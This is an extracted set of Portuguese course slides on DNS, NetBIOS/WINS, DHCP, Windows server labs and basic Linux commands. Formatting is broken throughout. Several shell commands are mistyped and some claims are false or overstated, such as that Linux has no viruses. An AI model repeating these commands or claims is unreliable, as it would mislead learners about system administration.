rvore de nomes
RAIZ br br pucpr
ufpr

Pucpr
www

Ufpr
ppgia www

www FOLHA

ppgia

www

Banco de Dados Distribudos


j No servio DNS, os nomes esto armazenados em ZONAS. Zonas so

arquivos textos que contm os nomes de um ou mais domnios.

br ZONA pucpr.br pucpr ppgia

RAIZ

ZONA .br ZONA ufpr.br


ufpr

www

www

www

j Cada Zona pode ser armazenada num servidor DNS distinto.

Banco de Dados Distribudos


ZONA .br br ZONA pucpr.br p cpr RAIZ
servidor dns.br

ZONA ufpr.br ufpr


ppgia servidor dns.ufpr.br

servidor dns.pucpr.br

www

www

www

Exemplo de arquivo de Zona


ZONA pucpr.br
j @ SOA dns.pucpr.br j @ NS dns.pucpr.br j dns.pucpr.br. A 200.17.99.2 j www A 200.17.99.2 j www.ppgia A 200.17.98.174

SOA: START OF AUTHORITY NS: NAME SERVER A: HOST

SOA indica qual o servidor armazena o arquivo de zona NS indica qual o servidor que responde pelo domnio. Nomes terminados por . so absolutos

Exemplos de arquivo de Zona


ZONA.br @ SOA dns.br @ NS dns.br pucpr NS www dns.ufpr.br ufpr NS dns.pucpr.br dns.pucpr A 200.17.99.2 dns.ufpr A 200.101.0.12

@ SOA dns.pucpr.br @ NS dns.pucpr.br dns.pucpr.br. A 200.17.99.2 www A 200.17.99.2 www.ppgia A 200.17.98.174 ZONA pucpr.br

j j j j

@ SOA dns.ufpr.br @ NS dns.ufpr.br dns.ufpr.br. A 200.101.0.12 www A 200.101.0.15

ZONA ufpr.br

Tipos de Registros no DNS


j A: Host Adress

associa um nome a um endereo IP: nome IP. j PTR: Point Resource Record associa um endereo IP a um nome: IP nome. j NS: Name Server identifica o servidor DNS no domnio. j SOA: Start of Authority indica que o servidor de DNS a autoridade para fornecer informaes no domnio (authoritative authoritative).

Consulta Reversa
correspondente. j Os registros que relacionam IPs aos nomes so do tipo PTR.
Por exemplo, um registro para o endereo IP 10.17.98.31 corresponde a uma entrada DNS no seguinte formato:
31.98.17.10.in-addr.arpa

j O cliente fornece um nmero IP e requisita o nome

j Se o endereo IP no estiver contido no domnio

local (aquele controlado pelo servidor DNS consultado), o servidor DNS contata o servidor DNS situado num n superior da rvore.
Este mecanismo de procura seqencial consultando os ns superiores chamado walking the tree.

Forwarder
configurao que diz: Lista de zonas que ele armazena Lista de servidores forwarders j Lista de zonas Indica a localizao fsica do arquivo correpondente a cada ZONA. j Lista de forwarders Um forwarder um servidor DNS hierarquicamente superior ao servidor corrente. Esse servidor recebe as consultas de domnios no armazenados pelo servidor DNS.
j Cada servidor DNS possui um arquivo de

Exemplo
Arquivo de configurao do servidor dns.pucpr.br forwarders { primeiro forwarder segundo forwarder etc. } zona { localizao } zona { localizao }

forwarders { 200.17.99.2 } pucpr.br { /etc/pucprbr.dns }

Ponteiros NS e Forwarders
FORWARDER

ZONA .br br RAIZ


NS NS

FORWARDER

ZONA pucpr.br pucpr

ZONA ufpr.br
ufpr

ppgia

www

www

www

Consulta Recursiva
j Graas ao ponteiros NS e FORWARDER qualquer servidor DNS pode

responder por toda a rvore de domnios. j A resposta pode ser:

O mapeamento nome-IP requisitado Uma mensagem de erro dizendo que o domnio ou host no foi encontrado.
RESPOSTA AUTORITRIA

a.pucpr.br?
IP = 10.17.98.31

1 2 2 5

.br
3 4

d.ufpr.br
IP = 200.17.98.174

pucpr
a b c

ufpr
d

6
RESPOSTA NO AUTORITRIA SE VIER DA CACHE

DNS e a Internet
j O root da rvore de nomes da Internet

gerenciado pelo Internet Network Information Center (InterNIC InterNIC) j InterNIC o nome dado a um projeto criado num acordo entre a National Science Foundation (NSF) e a Network Solutions, Inc. Prov um servio de registro de nomes para os domnios .com, .net, .org, and .edu; O site do InterNIC http://www.internic.net j O InterNIC delega a responsabilidade de administrar partes do domnio de nomes para as empresas e organizaes conectadas na Internet.

Domnios Gerenciados pelo InterNIC


j Segundo a nomenclatura adotada na Internet, o

Domain Name Space dividido em trs reas principais:


Organization Domains:
3 caracteres para indicar a atividade da empresa. .com, .edu, .gov, .int, .mil, .net, .org .int: organizaes internacionais .mil: organizaes militares .org: organizaes no comerciais

Geographical Domains:
2 caracteres para identificar o pas. .br, .fr, .jp, etc.

Reverse domain:
domnio especial utilizado para associar endereos IP aos nomes.

Exemplo
Gerido pelo InterNIC

.br .com .org


Gerido pela FAPESP

.edu .com .pucpr


Gerido pela PUC

Fully qualified domain name (FQDN) www.pucpr.br

www

rla01 ppgia

Zonas
Servidor DNS do Internic

REGISTRO NS

.br .com .org .edu .com .pucpr

Servidor DNS da FAPESP

Servidor DNS da PUC

www

rla01 ppgia

Tipos de Servidores
j Primrio
o servidor autoritrio para zona. A incluso, alteraes ou excluso dos registros da zona so feitas atravs deste servidor. O servidor primrio envia uma cpia dos seus arquivos de dados para o servidor secundrio atravs de um processo denominado zone transfer transfer

j Secundrio
Funciona como backup. Apenas l os arquivos de dados do servidor primrio, e responde as requisies dos clientes quando requisitado.

j Caching-Only Caching So servidores DNS que apenas efetuam consultas e guardam o resultado numa cache e retornam os resultados. Um servidor DNS realiza consulta a outros servidores sempre que tiver que localizar um nome externo as zonas que controla.

DNS - Resumo
j Vantagens:
Implementa um mecanismo de nomes hierrquico.
Isto facilita a organizao dos nomes em redes de grande porte.

O banco de dados que armazena os nomes distribudo.


Cada servidor DNS contm informaes de zonas especficas, e pode ser administrado separadamente.

o mecanismo de nomes adotado na Internet.


Pode ser utilizado para resolver nomes na rede local (intranet) e na rede Internet.

j Desvantagem:
No dinmico.
responsabilidade do administrador manter as entradas do arquivo de nomes atualizada.

Netbios

233

Nomes NetBIOS
j O espao de nomes NetBIOS flat
flat = no segmentado implica que cada nome NetBIOS na rede deve ser nico

j Os recursos na rede so identificados por nomes

NetBIOS registrados dinmicamente quando:


o computador inicializado servios so inicializados usurio se loga.

j Nomes NetBIOS tem 16 caracteres de comprimento.


O usurio atribui os 15 primeiros caracteres. O ltimo caracter reservado para indentificar o tipo de recursos.

Nomes Registrados na Estao


j C:\>nbtstat -n j Endeo-Ip n: [200.17.98.217] Identificador de escopo: [] j Tabela de nomes locais de NetBIOS j j j j j j j j

Nome Tipo Status -----------------------------------------------------------------------PPGIA16 <00> UNIQUE Registrado PPGIA16 <20> UNIQUE Registrado MESTRADO <00> GROUP Registrado PPGIA16 <03> UNIQUE Registrado MESTRADO <1E> GROUP Registrado JAMHOUR <03> UNIQUE Registrado

Nomes NetBIOS
j Podem ser de dois tipos:
UNIQUE (one owner)
Referenciam um nico recurso na rede Exemplo: uma estao

GROUP (multiple owner)


Referenciam um conjunto de recursos na rede Exemplo: nome de domnio, nome de grupo

j Alguns exemplos de tipos para identificadores

nicos so:

<00> Nome do Computador e do Domno (ou grupo) <03> Usurio logado <20> Servio de nomes de servidor para sincronizao de arquivos compartilhados

Registro e Resoluo de Nomes NetBIOS


j Os seguintes mecanismos so utilizados para

localizar recursos NetBIOS


NetBIOS name cache NetBIOS name server - WINS server IP subnet broadcast Static LMHOSTS files Static HOSTS files DNS servers

j Os mecanismos de resoluo de nomes do

NetBIOS sobre TCP/IP so definidos pelas RFCs 1001 e 1002


de acordo com a estratgia utilizada para resolver nomes, os computadores so denominados b-node, pnome, m-node ou h-node.

Resoluo de Nomes por BroadCast


j Resoluo de nomes usado broadcast IP fornece um

mtodo dinnico para resoluo de endereos. Datagrama NetBIOS Name Query em broadcast perguntando o nome correspondente ao endereo. Endereo MAC: FF-FF-FF-FF-FF-FF Endereo IP: 255.255.255.255 j Problemas: Aumento do trfego na rede No funciona em redes segmentadas por rotedores Os recursos localizados em outras redes no recebem os pedidos de broadcast pois, por default, o roteador bloqueia os pacotes recebidos em broadcast.

Extranets = VPN (Virtual Private Networks)


NOMES NETBIOS NOMES NETBIOS

ACME

IAPO1

IAPO2

LAB0101

PPGIA

REDE A

REDE B
BROADCAST BROADCAST

Cache com Nomes NetBIOS


j Cada estao mantm uma tabela com os nomes NetBIOS

mais usados recentemente.

j C:\>nbtstat -c j Endereo-Ip n: [200.17.98.217] Identificador de escopo: [] j Tabela de nomes de caches remotas de NetBIOS j j j j j

Nome Tipo Endereo Host [seg] --------------------------------------------------------------PPGIA07 <00> UNIQUE 200.17.98.224 PPGIA07 <20> UNIQUE 200.17.98.224 HAL2001 <00> UNIQUE 10.17.98.31

Durao

20 600 660

Usando o Arquivo HOSTS


j O arquivo hosts permite relacionar nomes a IPs,

evitando a resoluo por broadcast.

A diretiva #PRE pode ser utilizada para registrar entradas diretamente na cache. Neste caso, as entradas so consultadas antes de qualquer outro mecanismo de resoluo:

j Exemplos:
10.17.98.31 hal2001 #pre 10.17.08.30 PPGIA16 #coloca a entrada na cache #no coloca na cache

j Existe tambm uma diretiva especial para definir

domnios:

10.17.98.42 server1 #pre

#DOM:ELETRICA.RIEP

SERVIDORES DE NOMES NETBIOS


j MECANISMO DE RESOLUO DE NOMES

NETBIOS SEM BROADCAST

Mantm uma tabela que mapeia os endereos IP com o nome dos computadores. A tabela atualizada dinamicamente toda a vez que uma mquina recebe um novo endereo IP.

j Exemplo: WINS: Windows Internet Name Service j O servio WINS trabalha numa arquitetura cliente-

servidor.

WINS Server:
manipula todos as consultas de nomes.

WINS Client:
registra seu nome e endereo no servidor WINS. envia as requisies de nomes para o WINS server.

WINS NO USA BROADCAST


IP e NOME so fornecidos na inicializao

WINS SERVER

ACME

IAPO1

IAPO2

LAB0101

PPGIA

TABELA DINMICA

REDE A
REQUEST

REDE B

REPLY

j Ao contrrio da resoluo de nomes por broadcast, WINS permite que os

Caractersticas do WINS

nomes sejam resolvidos de maneira transparente atravs de roteadores.


WINS server

WINS enabled Non- WINS enabled

replicao

roteador

LINK DE BAIXA CAPACIDADE

WINS server

WINS pro y

j WINS Server

Definies
Computador que executa o servio Windows Internet Name
Este computador mantem uma base de dados relacionando os nomes e os endereos IP das estaes na rede.

Pode haver mais de um servidor WINS na rede.

j Cliente WINS enabled


Estao configurada para resolver nomes pelo WINS.

j Cliente Non-WINS enabled


Estao no configurada ou incompatvel com o servio WINS.

j WINS proxy
Estaes que acessam o servio WINS para os clientes Non-WINS enable.

Mltiplos Servidores WINS


j A utilizao de mltiplos servidores WINS aconselhvel

pois: permite distribuir a carga de resoluo de nomes as consultas de nomes feita pelos clientes so ponto-aponto. O mecanismo de broadcast s utilizado quando o nome solicitado no encontrado na base do servidor WINS. diminui a possibilidade de interrupo do servio de nomes cada servidor WINS possui uma cpia completa da base de nomes, funcionando como backup dos demais. quando um servidor entra em pane, os clientes passam a consultar automaticamente o outro servidor.

WINS NO APROPRIADO PARA INTERNET


WINS SERVER REPLICAO WINS SERVER

WINS SERVER

WINS SERVER

j Para redes grandes, o WINS invivel pois: O nmero de replicaes muito grande Cada servidor WINS guarda uma cpia completa de todos os nomes.

j Os nomes NetBIOS so concedidos por emprstimo. Precisam ser

Ciclo de Vida dos Nomes NetBIOS


Active (Ativo)

renovados periodicamente para que o computador mantenha o nome. O cliente foi desligado Ou o nome foi liberado e plicitamente

O prazo de renovao foi esgotado (6 dias)

Released (Liberado) No renovado ( dias) Elimando

OUTRO COMPUTADOR PODE SOLICITAR O DIREITO DE USAR O NOME

Resoluo de Nomes
j Os mecanismos de resoluo de nomes do NetBIOS

sobre TCP/IP so definidos pelas RFCs 1001 e 1002.

b-node: (broadcast-node) resolvem nomes por broadcast de IP p-node: (point-to-point-node) usam um servidor de nomes NetBIOS m-node: (mix -node) se b-node falhar tentam p-node. h-node: (hybrid-node) se p-node falhar tentam b-node

WINS - Resumo
j Vantagens:
Reduz significativamente o nmero de broadcasts de endereos IP necessrios para localizar recursos locais e remotos. Permite que clientes resolvam nomes de estaes situados em segmentos remotos isolados por roteadores. Reduz a necessidade de manter e atualizar os arquivos LMHOSTS.

j Desvantagens:
No implementa um mecanismo de nomes hierrquico. Isto dificulta a administrao de redes de grande porte. O banco de dados que armazena os nomes NetBIOS no distribudo. Cada servidor WINS constitui uma rplica completa do banco de dados de nomes. No compatvel com o servio de nomes usado na Internet.

DHCP

251

DHCP
j Dynamic Host Configuration Protocol Padro Industrial Aberto
IETF RFC 1533, 1534, 1541 e 1542. IETF: Internet Engineering Task Force RFC: Request for Comments

Utilizado para centralizar a administrao e configurao de parmetros TCP/IP numa rede. Elimina a necessidade de configurar manualmente os clientes numa rede TCP/IP.

DHCP - Arquitetura ClienteServidor deve funcionar como servidor DHCP. Um computador da rede
REQUEST
SERVIDOR DHCP

CLIENTES DHCP

REPLY

Administrao de Endereos IP
j Cada computador numa rede TCP/IP deve ter um

endereo IP nico.

O endereo IP identifica a estao e a rede ao qual a estao pertence. Quando o computador movido para outra rede, seu endereo IP deve refletir esta mudana.

j DHCP especifica os seguintes servios (RFC 1541):


um protocolo para que o servidor DHCP e seus clientes se comuniquem.
PROTOCOLO BOOTP

Um mtodo para configura os parmetros de rede de um host IP:


IP, mscara, gateway default, servidores de nomes, etc.

ESCOPO DHCP
j Quando se utiliza DHCP, cada rede local caracterizada

por um ESCOPO:
PARTE FIXA

MASCARA GATEWAY SERVIDOR DE NOMES OUTRAS ROTAS PERODO DE EMPRSTIMO

MESMO VALOR PARA TODOS OS HOSTS DO ESCOPO

PARTE DINMICA RANGE DE IPS

UM VALOR DIFERENTE PARA CADA HOST DO ESCOPO

Processo de Atribuio
ESCOPO

Dhcpdiscover Dhcpoffer 200.17.98.1

255.255.255.0 200.17.98.23 72 horas 200.17.98.1 200.17.98.254

Cliente DHCP

Dhcprequest 200.17.98.1 Dhcpack 200.17.98.1

Todas as mensagens so enviadas em broadcast

...
Dhcprelease 200.17.98.1

Servidor DHCP

Processo de Atribuio
j 1) O cliente envia a mensagem Dhcpdiscover em broadcast. j

O endereo IP de origem do pacote 0.0.0.0 pois o cliente ainda no tem um endereo IP. 2) Quando o servidor recebe o pacote, ele seleciona um endereo IP disponvel na sua lista e oferece ao cliente. O servidor responde ao cliente com a mensagem Dhcpoffer 3) Quando o cliente recebe a oferta ele pode: aceitar enviando a mensagem Dhcprequest (incluindo o IP) em broadcast recusar enviando a mensagem Dhcpdecline em broadcast 4) Quando o servidor recebe o Dhcprequest ele pode: confirmar para o cliente com a mensagem Dhcpack recusar, se o endereo foi usado por outro, com a mensagem Dhcpnack 5) O cliente pode liberar um endereo com a mensagem Dhcprelease.

Observaes
j 1) O cliente aceita a primeira oferta que receber.

Se houver mais de um servidor DHCP distribuindo endereos IP, no haver como selecionar apenas um deles. j 2) O direito do cliente de usar o endereo IP recebido pelo servidor DHCP temporrio. Quando o prazo de validade do IP expira, o servidor pode atribu-lo a outra estao na rede. O cliente pode liber-lo antecipadamente com a mensagem Dhcprelease

Observaes
j 3) Se o cliente no receber a oferta do

servidor: Ele repete o pedido em intervalos de 2, 4, 8, 16 segundos. Se as 4 tentativas fracassarem, ele tenta novamente em intervalos de 5 minutos. j 4) Quando o cliente reinicializado, ele tenta utilizar o mesmo IP que tinha anteriormente. Ele envia o pacote Dhcprequest com o endereo IP antigo ao invs do Dhcpdiscover. Se o pedido negado, ento o cliente envia um Dhcpdiscover.

Processo de Atribuio: Outras Vezes


Dhcprequest 200.17.98.1 Dhcpack 200.17.98.1

ESCOPO

255.255.255.0 200.17.98.23 72 horas 200.17.98.1 200.17.98.254

Cliente DHCP

OU
Dhcpnack Dhcpdiscover

Todas as mensagens so enviadas em broadcast

Servidor DHCP

Consideraes sobre o Planejamento da Implementao do DHCP


j Para redes no segmentadas:
Um nico servidor DHCP pode atender at 10000 clientes (estimativa).

j Para redes segmentadas:


Se os roteadores so compatveis com a RFC1542
Um nico servidor DHCP suficiente.

Se os roteadores no so compatveis com a RFC1542


Deve-se utilizar um servidor DHCP para cada rede.

j Computadores que se ligam temporariamente na rede

(notebooks, por exemplo) devem receber IPs com tempo de leasing curto.

Posicionando Servidores DHCP


Servidor DHCP 1 Agente relay DHCP/BOO TP Roteador RFC 1542 compatvel

Roteador no RFC 1542 compatvel

Servidor DHCP 2

Prtica: DHCP
j Instalar e configurar o DHCP; j Criar Escopo j reas de excluses j Definir arquivos por MAC ADDRESS

263

Prtica : Instalao DHCP

264

Prtica: Instalao de Servios


j DNS j Terminal Service j Wins

265

Instalar Terminal Service

266

Prtica : Instalando o IIS


j Instalando e configurando j Disponibilizando um site j Configurando o DNS

267

Prtica: IIS

268

Prtica: IIS

269

Prtica: Criao de Domnio


j Instalar e configurar o dominio; j Criar usurios j Compartilhamento de arquivos j Definio de segurana com o GPO

270

Prtica: Instalao DHCP

271

Prtica: Criar Domnio


j Iniciar / Executar / dcpromo

272

Prtica: Criar Domnio

273

Prtica: Criar Domnio

274

LiNUX: Ubuntu

275

Instalao

276

Instalao (cont)

277

Estrutura dos diretrios


Vamos conhece-los de acordo com a FHS (Filesystem Hierarchy Standard): Todos os diretrios abaixo ento dentro do diretrio raiz, ou seja, /. j /bin : Arquivos e programas do sistema que so usados com freqncia pelos usurios. j /boot : Arquivos necessrios para a inicializao do sistema. j /cdrom : Ponto de montagem da unidade de CD-ROM. j /dev : Arquivos usados para acessar dispositivos do computador. j /etc : Arquivos de configurao do computador. j /floppy : Ponto de montagem de unidade de disquetes j /home : Diretrio que contm os arquivos de cada usurio. j /lib : Bibliotecas do sistema. j /lost+found : Local de arquivos e/ou diretrios recuperados pelo sistema.
278

Estrutura dos diretrios (cont)


j /mnt : Ponto de montagem temporrio. j /proc : Sistema de arquivos do Kernel. j /root : Diretrio do usurio root, o administrador do sistema. j /opt : Local para aplicativos opcionais serem instalados. j /media : Ponto de montagem de mdia removvel, cmeras

digitais, pendrives j /sbin : Diretrio de programas usados pelo superusurio (root) para administrao e controle do funcionamento do sistema. j /tmp : Arquivos temporrios criados por programas. j /usr : Diretrio dos aplicativos. A maioria estar instalada neste diretrio. Curiosidade: usr no quer dizer User e sim Unix System Resources. j /var : Diretrio contm arquivos que so gravados com freqncia pelos aplicativos do sistema, como: e-mails, cache, spool de impressora. Essa estrutura que mostrei acima, considerada padro. Encontrar a mesma se estiver utilizando a distribuio da Red Hat, SuSe ou 279 o Ubuntu.

Estrutura de dispositivos
Linux j ttyS0 j ttyS1 j ttyS2 j ttyS3 j lp0 j lp1 j /dev/hda1 j /dev/hda2 j /dev/hdb1 DOS COM1 COM2 COM3 COM4 LPT1 LPT2 C: D: D: IRQ 4 3 4 3 7 5 14 * 14 15 DMA I/O 0x3F8 0x2F8 0x3E8 0x2E8 3(ECP) 0x378 3(ECP) 0x278 0x1F0,0x3F6 0x1F0,0x3F6 0x170,0x376
280

Comandos Bsicos Comparao DOS x Linux


DOS
cls dir

Linux
clear ls -la

Diferenas
Sem diferenas. A listagem no Linux possui mais campos (as permisses de acesso) e o total de espao ocupado no diretrio e livre no disco deve ser vistos separadamente usando o comando du e df. Permite tambm listar o contedo de diversos diretrios com um s comando (ls /bin /sbin /...). Poucas diferenas. cd sem parmetros retorna ao diretrio de usurio e tambm permite o uso de "cd -" para retornar ao diretrio anteriormente acessado. Poucas diferenas. O rm do Linux permite especificar diversos arquivos que sero apagados (rm arquivo1 arquivo2 arquivo3). Para ser mostrados os arquivos apagados, deve-se especificar o parmetro "-v" ao comando, e "-i" para pedir a confirmao ao apagar arquivos. Uma s diferena: No Linux permite que vrios diretrios sejam criados de uma s vez (mkdir /tmp/a /tmp/b...). Os particionadores do Linux trabalham com praticamente todos os tipos de parties de diversos sistemas de arquivos diferentes. Sem diferenas.
281

cd

cd

del

rm

md fdisk help

mkdir fdisk, cfdisk man, info

Comandos Bsicos Comparao DOS x Linux


DOS
echo copy

Linux
echo cp

Diferenas
Sem diferenas. Poucas diferenas. Para ser mostrados os arquivos enquanto esto sendo copiados, deve-se usar a opo "-v", e para que ele pergunte se deseja substituir um arquivo j existente, deve-se usar a opo "-i". No Linux deve ser usado ":" para separar os diretrios e usar o comando "export PATH=caminho1:/caminho2:/caminho3:" para definir a varivel de ambiente PATH. O path atual pode ser visualizado atravs do comando "echo $PATH". Poucas diferenas. No Linux no possvel renomear vrios arquivos de uma s vez (como "ren *.txt *.bak"). necessrio usar um shell script para fazer isto. Sem diferenas. Poucas diferenas (o uname tem algumas opes a mais). Poucas diferenas, precisa apenas que seja especificado o dispositivo a ser formatado como "/dev/fd0" ou "/dev/hda10" (o tipo de identificao usada no Linux), ao invs de "A:" ou "C:". Mostra detalhes sobre a quantidade de dados em buffers, cache e memria virtual (disco).
282

path

path

ren

mv

type ver format

cat uname -a mkfs.ext3

mem

cat /proc/meminfo top

Comandos Bsicos Comparao DOS x Linux


DOS
date time attrib

Linux
date date chmod

Diferenas
No Linux mostra/modifica a Data e Hora do sistema. No Linux mostra/modifica a Data e Hora do sistema. O chmod possui mais opes por tratar as permisses de acesso de leitura, gravao e execuo para donos, grupos e outros usurios. O fsck mais rpido e a checagem mais abrangente. O fsck mais rpido e a checagem mais abrangente. A memorizao de comandos feita automaticamente pelo bash. O edit mais fcil de usar, mas usurio experientes apreciaro os recursos do vi ou o emacs (programado em lisp) O plip do Linux permite que sejam montadas redes reais a partir de uma conexo via Cabo Paralelo ou Serial. A mquina pode fazer tudo o que poderia fazer conectada em uma rede (na realidade uma rede e usa o TCP/IP como protocolo) inclusive navegar na Internet, enviar e-mails, irc, etc. Mesmo que o acima.
283

chkdsk scandisk doskey edit

fsck.ext3 fsck.ext3 ----vi, ae, emacs, mcedit plip

interlnk

intersvr

plip

Comandos Bsicos Comparao DOS x Linux


DOS label more Linux e2label more, less Diferenas necessrio especificar a partio que ter O more equivalente a ambos os sistemas, mas o less permite que sejam usadas as setas para cima e para baixo, o que torna a leitura do texto muito mais agradvel. Poucas diferenas. Para ser mostrados os arquivos enquanto esto sendo movidos, deve-se usar a opo "-v", e para que ele pergunte se deseja substituir um arquivo j existente deve-se usar a opo "-i". No existem vrus no Linux devido as restries do usurio durante execuo de programas. O tar permite o uso de compactao (atravs do parmetro -z) e tem um melhor esquema de recuperao de arquivos corrompidos que j segue evoluindo h 30 anos em sistemas UNIX. O lpr mais rpido e permite at mesmo impresses de grficos ou arquivos compactados diretamente caso seja usado o programa magicfilter. o programa de Spool de impressoras usados no sistema Linux/Unix. Sem diferenas. Pouca diferena, requer que seja usado a opo "-v" para mostrar os arquivos que esto sendo copiados e "-i" para pedir confirmao de substituio de arquivos.

move

mv

scan backup

----tar

print

lpr

vol xcopy

e2label cp -R

284

Comandos Bsicos
j Verificar o Local onde est trabalhando => pwd j Criar diretrio => mkdir <diretorio>

mkdir <aula>
j Chamar diretrio => cd

cd aula
j Verificar o que existe no diretrio => ls la j Criar arquivos vazios => touch

touch arquivo1
j Editar o arquivo => vi, mc,

vi <arquivo> ou vi /<caminho>/arquivo
285

Comandos Bsicos
j Alguns comandos do vi

inserir -> a,insert yy -> copiar (copiar n linhas usar n cc) dd -> apagar (apaga n linhas usar n dd) p -> colar / -> procurar v -> desfaz a ltima alterao :x ou :wq -> salva e sai :q! -> sair sem salvar
j Criar o texto abaixo (crie 2 arquivos fazios chamado http e telnet edite

o texto abaixo): ### Permite acesso web (HTTP). $IPTABLES -A FORWARD -p tcp --dport 80 -j ACCEPT

### Permite acesso web (TELNET). $IPTABLES -A FORWARD -p tcp dport 23 -j ACCEPT
286

Comandos Bsicos
j Move arquivo => mv

mv /<caminho_antigo>/<arquivo> /<novo_caminho>/<arquivo>
j Renomear arquivo=> mv

mv /<caminho>/<arquivo atual> /<caminho>/<arquivo novo >


j Diferena entre 2 arquivos => diff

diff <arquivo1> <arquivo2> Para melhor fixao faa o seguinte exerccio: - Na sua pasta home, crie um diretrio chamado aula e dentre dele mais dois diretrios chamados http e ftp. - Move os arquivos criados anteriormente (http e ftp) para as suas respectivas pastas - Renomeie os arquivos para new_http e new_ftp - Verifique a diferena entre os arquivos

287

Comandos Bsicos
j verificar uma placa de rede => ifconfig j Verificar os usurios que esto logados ou em telnet => w j Compactar arquivos

Tar.gz => tar -cvfz <nm do arquivo>.tar.gz <diretrio a ser compactado> Ex: tar -cvfz etc.tar.gz etc bz2 (melhor compactao) tar cvjf <nmdoarquivo>.tar.bz2 /<caminhod do arquivo> EX: tar cvjf ergon.tar.bz2 /mnt/temp
j Para descompactar estes formatos de arquivos, os comandos so

simples: zip: => gunzip nomedoarquivo rar: => rar x nomedoarquivo tar: => gzip nomedoarquivo tar.gz: => tar -vzxf nomedoarquivo tar.bz2: => tar -vxjpf nomedoarquivo

288

Comandos Bsicos
j juntar dois arquivos => cat <arquivo final> <arquivo1> <arquivo2> j Dar permisso arquivos => chmod

chmod <numero> <caminho/arquivo>


j Verificao de Permisso (direito nos arquivos)

d rwx r-x wx d => diretrio 1 trinca => usurio proprietrio 2 trinca => grupo do usurio proprietrio 3 trinca => outros usurio r -> read (4) w-> write (2) x ->execute (1) rwx -> 4+2+1=7 r-x -> 4+0+1=5 rw- -> 4+2+0=6 r-- -> 4+0+0=4
289

Comandos bsicos
j Exerccio de fixao

Dentro do diretrio aula crie um arquivo apartir da juno dos arquivos http_new e ftp_new, cujo nome ser firewall, sendo que este arquivo dever ter as seguintes permises: Usurio proprietrio = completo Grupo usurio proprietrio = leitura e escrita Outros = leitura e execuo Depois faa a compactao da pasta aula
290

Comandos Bsicos
j Verificar processos rodando na maquina => top ou ps aux ou os -aux

|grep <processo>

j Matar processos => kill -9 <pid processo> j Montar unidades (cdrom, pen driver, hd sata, ...) => mount

$ sudo fdisk l $ mount /dev/sda


j Desmontar => unmount

Unmount /dev/das Exerccio: Mountar e desmontar a unidade do cdrom. Abrir uma nova sesso (console) e matar o seu processo.

291

Comandos Bsicos Respostas

sudo mount /dev/cdrom /cdrom umount /cdrom ps aux |grep console Kill -9 <numero processo>
j Localizar arquivos no computador => find ou locate

$ find caminho expresses updatedb & locate <arquivo> Ex: Para localizar arquivos que foram acessados nos ltimos 10 dias e os arquivos cujo nome seja sysconfig $ find / -used 10 e $locate sysconfig Exerccio: Localizar todos os arquivos que possuam a palavra host e que estejam dentro da pasta /var

Updatedb Locate host | grep var

ou find /var | grep host


292

Comandos bsicos
j verificar o espao em disco => df h j verificar o que o diretrio possue e o tamanho => du h j Verificar memria => free j Verifica os espaos por parties => dh -f
j Verifica o tamanho dos arquivos e faz a soma do total no final =>df -h c j Verificar o processador do servidor => cat /proc/cpuinfo j reparar disco (*) => fsck -cy /dev/???

Exerccio: Gostaria de saber quanto tenho de espao de disco livre e quanto de espao o meu diretrio, a quantidade de memria total e livre, qual o meu processador, a quantidade de processos rodando nele e reparar o meu disco

$ df h $ du -h /home/virtual $free $ top $ cat /proc/cpuinfo $ fsck cv /dev/sda1

293

Localizao de Arquivos Importantes


j

servios e resolues de problemas dhcpd ==> /etc/rc.d/init.d/dhcpd restart samba ==> /etc/rc.d/init.d/smb restart apache ==> /etc/rc.d/init.d/httpd restart sendmail ==> /etc/rc.d/init.d/sendmail restart

verificaes de logs dhcpd ==> /var/log/mensages samba ==> /var/log/samba/log.smb log.nmb log.<nm do computador> apache ==> /var/log/httpd/access_log sendmail ==> /var/log/maillog printer ==> /var/log/spooler

arquivos para serem backpeados usurio ==> /etc/passwd grupos ==> /etc/group conf impressora ==> /etc/printcap tabela de IP ==> /etc/hosts dhcpd ==> /etc/dhcpd.conf sendmail ==> /etc/sendmail.cf samba ==> /etc/smb.conf senhas do samba ==> /etc/smbpasswd apache ==> /etc/httpd/conf/acess.conf /etc/httpd.conf /etc/srm.conf
j

294

Comparao dos Programas do Windows x Linux


Windows
Microsoft Office

Linux
Open Office

Diferenas
O Open Office possui todos os recursos do Word, excel e power point alm de ter a interface grfica igual, menus e teclas de atalho idnticas ao office, o que facilita a migrao. Tambm trabalha com arquivos no formato office 97/2000 e no vulnervel a vrus de macro. Existem diversas ferramentas de conceito para bancos de dados corporativos no Linux. Todos produtos compatveis com outras plataformas. Centenas de programas de E-Mail tanto em modo texto como em modo grfico. Instale, avalie e escolha. Os trs primeiros para modo grfico e o lynx opera em modo texto. Muito prtico e fcil de operar. Possibilita a mudana completa da aparncia do programa atravs de Skins. A organizao dos menus deste programa outro ponto de destaque. Permite conversar diretamente com usurios do Microsoft MSN. Fcil de usar, possui muitos scripts que permitem a criao rpida e fcil de qualquer tipo de efeito profissional pelo usurio mais leigo. Acompanha centenas de efeitos especiais e um belo manual em html com muitas fotos aproximadamente 20MB) que mostra o que possvel se fazer com ele. 295

MS Access

MySQL, PostgreSQL Oracle Pine, icedove evolutionmutt sylpheed, Firefox, Opera, Mozilla, lynx. LICQ, PIDGIM, SIM AMSN, PIDGIM The Gimp

MS Outlook

MS Internet Explorer ICQ

MSN Photo Shop

Comparao dos Programas do Windows x Linux


Windows
Corel Photo Paint Corel Draw Autocad Visio winamp media player Agente de Sistema Bate-Papo

Linux
GIMP Inkscape, Sodipodi Qcad dia xmms mplayer, playmidi xwave, cron talk, ytalk

Diferenas
Programa com funes genricas Programas equivalentes Programa com funes genricas Possui funcionalidades identicas e timo conjunto de cones Possui todos os recursos do programa para Windows alm de filtros que permite acrescentar efeitos digitais da msica (em tempo real), eco, etc. Programas para execuo de arquivos de msica e videos multimdia. Existem outras alternativas, a escolha depende de seu gosto e da sofisticao do programa. Pouca diferena. O cron da mais liberdade na programao de tarefas a serem executadas pelo Linux. O talk e o ytalk permite a conversa de dois usurios no s atravs de uma rede local, mas de qualquer parte do planeta, pois usa o protocolo tcp/ip para comunicao. Muito til e fcil de usar. O apache o servidor WEB mais usado no mundo (algo em torno de 75% das empresas), muito rpido e flexvel de se configurar. 72% da base de servidores de emails no mundo atualmente roda em software livre. Os mais recomendados so o Postfix e o qmail, devido a segurana, velocidade e integridade de mensagem

IIS, Pers. Exchange, NT Mail

Web Server Apache Postfix, Sendmail Exim, Qmail

296

Comparao dos Programas do Windows x Linux


Windows
Wingate, MS Proxy kerio

Linux
Squid, Apache Ip masquerade, nat, diald, exim,

Diferenas
